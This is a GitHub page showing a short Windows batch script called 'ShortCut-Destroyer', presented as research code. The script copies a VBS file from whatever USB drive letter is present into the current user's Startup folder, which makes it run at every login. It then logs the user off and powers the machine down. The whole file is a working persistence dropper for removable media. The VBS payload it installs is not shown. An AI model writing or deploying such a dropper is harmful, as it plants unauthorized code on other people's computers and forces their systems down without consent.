-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcopy.bat
More file actions
23 lines (20 loc) · 1022 Bytes
/
copy.bat
File metadata and controls
23 lines (20 loc) · 1022 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
REM +++++++++++++++++
REM | vknife |
REM +++++++++++++++++
REM
REM *~ ShortCut-Destroyer ~*
REM
REM For research purposes only
REM
REM Henry Samuelson, Christopher Hansen
REM test sources, bc we dont know what the USB drive will be named by the system
xcopy /s D:\short.vbs "%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
xcopy /s E:\short.vbs "%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
xcopy /s F:\short.vbs "%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
xcopy /s G:\short.vbs "%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
REM this shouldnt happen but if the drive is named weird
xcopy /s A:\short.vbs "%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
xcopy /s B:\short.vbs "%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
REM then reboot system to run the startup applications
shutdown /l
shutdown /p